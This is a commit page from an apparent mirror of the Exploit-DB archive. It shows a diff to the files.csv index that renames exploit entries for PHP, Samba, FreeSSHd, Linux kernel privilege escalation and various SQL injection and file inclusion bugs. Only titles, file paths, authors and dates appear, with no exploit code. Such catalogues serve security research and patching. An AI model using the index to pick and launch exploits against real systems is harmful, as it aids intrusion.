bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-03

Browse source 
1 new exploits

PHP - wddx_deserialize() String Append Crash
PHP 5 - wddx_deserialize() String Append Crash

PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)
PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)

Samba 3.0.27a - send_mailslot() Remote Buffer Overflow
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow
PHP 5.2.6 - sleep() Local Memory Exhaust Exploit
CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)
PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit
CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
Samba (client) - receive_smb_raw() Buffer Overflow (PoC)
FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)

freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC
FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)

freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC
FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)

FreeSSHD 1.2.4 - Remote Buffer Overflow Denial of Service
FreeSSHd 1.2.4 - Denial of Service

Samba - Multiple Denial of Service Vulnerabilities
Samba 3.4.7/3.5.1 - Denial of Service

FreeSSHd - Crash (PoC)
FreeSSHd - Denial of Service (PoC)

PHP - Hashtables Denial of Service
PHP 5.3.8 - Hashtables Denial of Service

freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service
FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service

freeSSHd 1.3.1 - Denial of Service
FreeSSHd 1.3.1 - Denial of Service

PHP - SplDoublyLinkedList Unserialize() Use-After-Free
PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free

PHP - SplObjectStorage Unserialize() Use-After-Free
PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free

PHP - Unserialize() Use-After-Free Vulnerabilities
PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities

PHP - 'ini_restore()' Memory Information Disclosure
PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure

Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation
Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation

Linux Kernel 3.13 - Privilege Escalation PoC (gid)
Linux Kernel 3.13 - Privilege Escalation PoC (SGID)

freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow

freeSSHd 1.2.1 - Authenticated Remote SEH Overflow
FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow

FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)
FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)
Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (Solaris SPARC) - trans2open Overflow (Metasploit)
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)

freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)
Samba (Linux x86) - trans2open Overflow (Metasploit)
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (OSX/PPC) - trans2open Overflow (Metasploit)
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)

Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)
Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

PHP - CGI Argument Injection (Metasploit)
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)

PHP - apache_request_headers Function Buffer Overflow (Metasploit)
PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)

Samba - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)

FreeSSHD 2.1.3 - Remote Authentication Bypass
FreeSSHd 2.1.3 - Remote Authentication Bypass

FreeSSHD - Authentication Bypass (Metasploit)
FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)

HP LoadRunner - magentproc.exe Overflow (Metasploit)
HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)

PHP - 'header()' HTTP Header Injection
PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection
VX Search Enterprise 9.0.26 - Buffer Overflow
Sync Breeze Enterprise 8.9.24 - Buffer Overflow
Dup Scout Enterprise 9.0.28 - Buffer Overflow
Disk Sorter Enterprise 9.0.24 - Buffer Overflow
Disk Savvy Enterprise 9.0.32 - Buffer Overflow
VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow
Sync Breeze Enterprise 8.9.24 - 'Login' Buffer Overflow
Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow
Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow
VX Search Enterprise 9.1.12 - Buffer Overflow
Sync Breeze Enterprise 9.1.16 - Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Buffer Overflow
Dup Scout Enterprise 9.1.14 - Buffer Overflow
Disk Savvy Enterprise 9.1.14 - Buffer Overflow
Disk Pulse Enterprise 9.1.16 - Buffer Overflow
VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow
Sync Breeze Enterprise 9.1.16 - 'Login' Buffer Overflow
Disk Sorter Enterprise 9.1.12 - 'Login' Buffer Overflow
Dup Scout Enterprise 9.1.14 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow
Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow

PHP - (php-exec-dir) Patch Command Access Restriction Bypass
PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass

phNNTP 1.3 - (article-raw.php) Remote File Inclusion
phNNTP 1.3 - 'article-raw.php' Remote File Inclusion

Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion
Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion

Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion
Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion

BP Blog 7.0 - (default.asp layout) SQL Injection
BP Blog 7.0 - 'layout' Parameter SQL Injection
Joomla! Component Artist (idgalery) - SQL Injection
FlashBlog - (articulo_id) SQL Injection
Joomla! Component Artist - 'idgalery' Parameter SQL Injection
FlashBlog - 'articulo_id' Parameter SQL Injection

AirvaeCommerce 3.0 - 'pid' SQL Injection
AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection

CMS from Scratch 1.1.3 - (image.php) Directory Traversal
CMS from Scratch 1.1.3 - 'image.php' Directory Traversal

HiveMaker Professional 1.0.2 - 'cid' SQL Injection
HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection

Social Site Generator - (sgc_id) SQL Injection
Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection
PHP Visit Counter 0.4 - (datespan) SQL Injection
PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion
BP Blog 6.0 - 'id' Blind SQL Injection
EasyWay CMS - 'index.php mid' SQL Injection
Social Site Generator - (path) Remote File Inclusion
Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection
PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection
PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion
BP Blog 6.0 - 'id' Parameter Blind SQL Injection
EasyWay CMS - 'mid' Parameter SQL Injection
Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion
Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection
Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection

HiveMaker Directory - 'index.php cid' SQL Injection
HiveMaker Directory - 'cid' Parameter SQL Injection

Goople 1.8.2 - (FrontPage.php) Blind SQL Injection
Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection

PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection
PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection

PsychoStats 2.x - Login Parameter Cross-Site Scripting

PsychoStats 2.3 - Server.php Full Path Disclosure
PsychoStats 2.3 - 'Server.php' Full Path Disclosure

PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities

PHP - cgimode fpm writeprocmemfile Bypass disable function demo
PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function

CMSimple - /2author/index.php color Parameter Remote Code Execution
CMSimple 4.4.4 - 'color' Parameter Remote Code Execution
This commit is contained in:
Offensive Security 2016-12-03 05:01:19 +00:00
parent 42018b3d96
commit 4b3da08aa9
4 changed files with 152 additions and 97 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

153
files.csv
View file

@ -514,7 +514,7 @@ id,file,description,date,author,platform,type,port
3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos,0
3396,platforms/linux/dos/3396.php,"PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos,0
3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String",2007-03-02,"Luigi Auriemma",windows,dos,0
3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
3404,platforms/multiple/dos/3404.php,"PHP 5 - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service",2007-03-05,mark,linux,dos,0
3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0
@ -613,7 +613,7 @@ id,file,description,date,author,platform,type,port
4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0
4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0
4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0
4227,platforms/windows/dos/4227.php,"PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0
4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0
4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,multiple,dos,0
@ -667,7 +667,7 @@ id,file,description,date,author,platform,type,port
4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0
4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0
4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0
4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0
4757,platforms/windows/dos/4757.txt,"HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
@ -731,11 +731,11 @@ id,file,description,date,author,platform,type,port
5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 - Remote Buffer Overflow Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
@ -1541,7 +1541,7 @@ id,file,description,date,author,platform,type,port
12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0
12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
12588,platforms/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",linux,dos,0
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
18268,platforms/windows/dos/18268.txt,"FreeSSHd - Crash (PoC)",2011-12-24,Level,windows,dos,0
18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
@ -2098,7 +2098,7 @@ id,file,description,date,author,platform,type,port
18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0
18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0
18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos,0
18296,platforms/php/dos/18296.txt,"PHP - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0
18296,platforms/php/dos/18296.txt,"PHP 5.3.8 - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0
19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0
18305,platforms/php/dos/18305.py,"PHP Hash Table Collision - (PoC)",2012-01-03,"Christian Mehlmauer",php,dos,0
18309,platforms/windows/dos/18309.pl,"VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos,0
@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@ -4699,11 +4699,11 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",windows,dos,21
38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)",2015-09-06,"Robbie Corley",win_x86-64,dos,0
38108,platforms/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38120,platforms/php/dos/38120.txt,"PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
38125,platforms/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0
38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,windows,dos,0
@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local,0
10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0
10295,platforms/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0
10296,platforms/php/local/10296.txt,"PHP - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0
10296,platforms/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0
10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal)",2009-12-04,"fl0 fl0w",windows,local,0
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
@ -8097,7 +8097,7 @@ id,file,description,date,author,platform,type,port
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
